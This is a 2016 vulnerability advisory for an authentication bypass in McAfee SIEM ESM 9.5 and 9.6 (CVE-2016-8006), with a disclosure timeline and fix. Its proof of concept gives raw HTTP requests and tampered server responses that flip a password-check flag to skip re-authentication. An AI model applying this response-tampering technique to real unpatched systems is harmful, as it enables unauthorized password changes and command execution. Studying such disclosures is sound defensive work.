McAfee SIEM ESM and ESMREC Authentication Bypass vulnerability

12-09-2016

 

Advisory McAfee SIEM ESM and ESMREC Authentication Bypass vulnerability
Affected Product: SIEM 9.5 and 9.6.
Credits: Vulnerability discovered by Claudio Cinquino of Quantum Leap S.R.L.
CVE: CVE-2016-8006

Executive Summary

SIEM 9.5 and 9.6.0 allow an administrative user to make changes to other SIEM users’ information including user passwords without supplying the current admin password a second time. GUI “Terminal” commands are also allowed by an active logged-in admin user without supplying the logged-in admin password a second time.

 

 

 

Proof of Concept

Authentication Bypass vulnerability has been detected on “Users and Groups” and “Terminal” forms in McAfee SIEM ESM 9.5.x and 9.6.x. For Authentication Bypass, set in password form any password and change response.

Authentication Bypass vulnerability on Users and Groups

 

Request:

POST /ess HTTP/1.1
Host: 192.168.164.110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: https://192.168.164.110/Application.swf
Content-type: application/x-www-form-urlencoded
Content-Length: 72

Request=API%13USER%5FVERIFYPW%13%14SID%131300480451%13%14PW%13test%13%14

Original Response:

HTTP/1.1 200 OK
Date: Thu, 12 May 2016 09:08:31 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

Response=EC%130%13%14OK%13F%13%14DCHNG%13F%13%14

Edited Response:

HTTP/1.1 200 OK
Date: Thu, 12 May 2016 09:08:31 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

Response=EC%130%13%14OK%13T%13%14DCHNG%13F%13%14

Authentication Bypass vulnerability on Terminal

Request:
POST /ess HTTP/1.1
Host: 192.168.164.110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: https://192.168.164.110/Application.swf
Content-type: application/x-www-form-urlencoded
Content-Length: 72

Request=API%13USER%5FVERIFYPW%13%14SID%131300480451%13%14PW%13test%13%14

Original Response:

HTTP/1.1 200 OK
Date: Thu, 12 May 2016 09:13:57 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

Response=EC%130%13%14OK%13F%13%14DCHNG%13F%13%14

Edited Response:

HTTP/1.1 200 OK
Date: Thu, 12 May 2016 09:13:57 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

Response=EC%130%13%14OK%13T%13%14DCHNG%13F%13%14

 

 

 

Figure 1 show example of Authentication Bypass of McAfee SIEM 9.5 and 9.6 for “Users and Groups”.

Figure 1 - “Users and Groups” Authentication Bypass Vulnerability McAfee SIEM ESM 9.5.0MR7 PoC

Solution

To fix the security issue we recommend to update at new version to 9.6.0 MR3 SIEM, the vendor has resolved this issue.

Disclosure Timeline

11/05/2016 – Vulnerability Discovered
12/05/2016 – Initial vendor notification
09/09/2016 – The vendor fixed the vulnerability
09/09/2016 – The vendor public Knowledge Bulletin
16/09/2016 – CVE Assigned

References

[1] http://cwe.mitre.org/data/definitions/592.html
[2] https://www.owasp.org/index.php/Category:Authentication_Vulnerability
[3] https://kc.mcafee.com/corporate/index?page=content&id=KB87744